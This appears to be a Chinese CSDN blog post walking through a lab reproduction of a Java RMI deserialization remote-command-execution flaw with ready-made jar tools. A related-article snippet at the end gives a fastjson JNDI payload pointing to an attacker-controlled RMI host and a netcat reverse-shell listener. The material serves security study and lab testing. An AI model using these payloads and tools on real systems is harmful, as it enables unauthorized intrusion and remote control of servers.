RMI反序列漏洞复现-——手把手光速复现,工具超全

最新推荐文章于 2024-03-28 09:59:27 发布
最新推荐文章于 2024-03-28 09:59:27 发布
阅读量2.9k 收藏 2
点赞数 3
文章标签: rmi java jar
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37771454/article/details/105075612
版权

RMI反序列漏洞复现-手把手光速复现,工具超全

RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。
  对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。
  RMI的传输100%基于反序列化。

所有复现的工具打包好了,看官给点小小银两,即可下载
(tips:某宝花几毛钱就可以秒下载 —嘿嘿绝不吃亏)
//download.csdn.net/download/weixin_37771454/12267674

一、靶机部署:

将rmiserver.jar复制到靶机桌面;
要求靶机为Linux且安装的Java版本为1.6,因为在1.8版本的JRE中该反序列漏洞已被修复***

Java 1.6.0 for Linux 下载链接,我的是64位的(已经装好jdk1.6的跳过):

链接:https://pan.baidu.com/s/1RIEbEFMAVsFc377n-txkpg 提取码:676z

右键打开命令行
vi /etc/hosts 在第二行添加靶机的外网地址(ifconfig查看),wq保存
然后cd到桌面
执行(让该rmi服务运行在靶机的外网端口6600)

java -jar rmiserver.jar 6600 rmi

提示service start!
在这里插入图片描述
说明服务成功启动

二、本机怎样查看是不是可以回显?

先在Windows ping一下靶机IP,看看是否ping通
然后把rmiclient.jar复制到Windows桌面
打开命令行cd到桌面目录
执行

java -jar ./rmiclient.jar 靶机IP 6600 rmi MESSAGE

执行后可以在靶机看到MESSAGE字样了
在这里插入图片描述
复现到这里基本就完成了,接下来就是工具的利用

三、attackRMI利用

Windows右键attackRMI.jar打开
输入靶机IP和端口6600 点击连接
连接成功后
输入ifconfig执行
在这里插入图片描述
成功回显 可以看到了靶机的ifconfig信息

四、想了解原理的可以看看这篇文章

https://blog.csdn.net/LeeHDsniper/article/details/71599504

WEIXIN_张公子
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
attackRmi:AttackRmi
04-12
AttackRmi 该项目使用套接字将数据包直接发送到攻击rmi。 以下jdk版本指的是openjdk的版本 以下方法通过序列化攻击rmi,因此以下6种攻击方法要求本地类路径包含小工具 AttackRegistryByBindAndAnnotationInvocationHandler 这实际上是ysoserial的RMIRegistryExploit。 状况: <jdk8u121 AttackRegistryByDGC 状况: <jdk8u121 AttackRegistryByLookup 状况: <jdk8u121 AttackRegistryByLookupAndUnicastRef 状况: <jdk8u232 AttackRegistryByLookupAndUnicastRefRemoteObject 状况: <jdk8u242 A
linux常用中间件服务,Web中间件/服务端口有哪些的相关知识?网络安全
weixin_39682944的博客
05-10 232
随着技术的发展,网络安全越来越重要,学习网络安全的人们越来越多。网络安全学习中,关于端口的相关内容,总是有很多人不明白,那么常见的Web中间件/服务端口有哪些?都有哪些相关知识?1090/1099 端口(RMI)安全漏洞JAVA RMI 序列化远程命令执行漏洞利用方式:使用nmap检测端口信息。端口信息:1099/1090 Java-rmi Java RMI Registry检测工具atta...
探秘AttackRmi:一款安全研究人员的利器
最新发布
gitblog_00001的博客
03-28 334
探秘AttackRmi:一款安全研究人员的利器 项目地址:https://gitcode.com/A-D-Team/attackRmi 项目简介 AttackRmi 是一个开源项目,旨在帮助安全研究人员和开发者识别并模拟RMI(远程方法调用)攻击。项目的核心是通过自动化工具,对Java RMI服务进行安全测试,揭示潜在的安全漏洞。 技术分析 AttackRmi 使用了Java语言开发,充分利用了J...
java url dns_JAVA序列化-ysoserial-URLDNS
weixin_42557537的博客
02-24 405
前言推荐阅读时间:10min内容-基础向:在IDEA中JAR的三种调试方式Ysoserial工具中URLDNS模块的原理分析POC代码以及Ysoserial的源码分析题外话:最近有一个小伙伴用**[email protected]**的邮箱戳我,已经写好了回件但是由于找不到这个邮箱地址回不回去。莫非用了伪装源地址的骚操作?但是为啥这么做呢emmm…..如果你看到这篇文的话,可以再私戳我认领下回信…..在IDEA中J...
常见端口对应服务及其漏洞
qq_67473072的博客
07-14 1171
常见端口对应服务及其漏洞
红蓝对抗之常见网络安全事件研判、了解网络安全设备、Webshell入侵检测
Love&Share
12-25 8145
文章目录研判(入侵检测)设备经典网络云网络异常HTTP请求Webshell分析Webshell 的分类Webshell 的检测主机层面流量层面附录常见端口漏洞参考文章: 研判(入侵检测) 研判我理解为人工层面对入侵检测事件进行再分析,即借助已有的设备告警根据经验判断是否为真实攻击 研判工作要充分利用已有安全设备(需要提前了解客户的网络拓扑以及部署设备情况),分析其近期的设备告警,将全部流量日志(日志条件:源地址,目的地址,端口,事件名称,时间,规则ID,发生 次数等)根据研判标准进行筛选(像挖矿、蠕虫、.
Java安全之攻击RMI的思考
why811的博客
08-11 287
这里,如果Java应用没有对传入的序列化数据进行安全性检查,我们可以将恶意的TransformedMap序列化后,远程提交给Java应用,如果Java应用可以触发变换,即可成功远程命令执行。结合前述Commons Collections的特性,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量是可控的,就可以实现我们的攻击目标了。例如,攻击者可以在序列化数据中包含恶意类或利用已知的序列漏洞
rmi 序列漏洞_写一个rmi序列工具
weixin_39997037的博客
01-07 2145
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在序列漏洞RMIjava序列化原理就不详细介绍了。RMI序列化利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在序列化链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
Java RMI漏洞利用(1099/1090对外开放-rce)
yggcwhat
01-18 1776
Java RMI漏洞利用(1099/1090对外开放-rce)
Javaweb安全——RMI序列
weixin_43610673的博客
04-13 1191
RMI RMI(Remote Method Invocation)即Java远程方法调用,RMI用于构建分布式应用程序,类似于RPC(Remote Procedure Call Protocol)远程过程调用协议,RMI实现了Java程序之间跨JVM的远程通信,使得一个JMV上的对象可以调用另一个JMV上的方法(方法在远程JVM上执行,只是返回运行结果)。这两个JVM可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。 RMI架构: RMI分为三个主体部分:Client,Server
JAVA_RMI序列化远程命令执行漏洞验证
qq_44828901的博客
12-29 4750
简单复现 JAVA RMI序列
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
attackRMI.jar
11-28
attackRMI.jar
javaRMI序列漏洞验证工具
08-21
检测javaRMI序列漏洞
JAVA序列漏洞知识点整理
01-20
jenkins序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA序列漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA序列漏洞相关的知识点。  JAVA序列漏洞  序列漏洞的...
JDK中rmi包下的类
杨春建的博客
11-28 1231
JDK中rmi包下的类
记不住的命令
weixin_44508748的博客
07-19 2380
Windows 1.运行窗口命令 #服务 services.msc #网络配置 ncpa.cpl #RDP登录 mstsc #注册表 gpedit #计算器 calc #系统配置 msconfig #日志 eventvwr.msc #控制面板 control #域 dcpromo #记事本 notepad #画图板 mspaint #本地用户和组 lusrmgr.msc #磁盘清理工具 cleanmgr #计算机管理 compmgmt.msc #共享文件夹管理 fsmgmt.msc #组策略 gped
fastjson序列漏洞复现vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson序列漏洞复现步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose up -d ``` 2. 打开浏览器,访问`http://your-ip:8080/`,可以看到一个输入框和一个提交按钮。 3. 在输入框中输入以下内容: ``` {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your-ip:1099/Exploit","autoCommit":true} ``` 其中,`your-ip`需要替换为你自己的IP地址。 4. 点击提交按钮,可以看到出现了一个弹窗,表示攻击成功。 5. 在vulhub所在的机器上执行以下命令: ``` nc -lvnp 4444 ``` 6. 在攻击成功的弹窗中,点击“确认”按钮,即可成功得到一个弹shell。 以上就是漏洞复现步骤,需要注意的是,该漏洞具有很大的危害性,攻击者可以通过该漏洞实现远程命令执行,因此需要及时修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值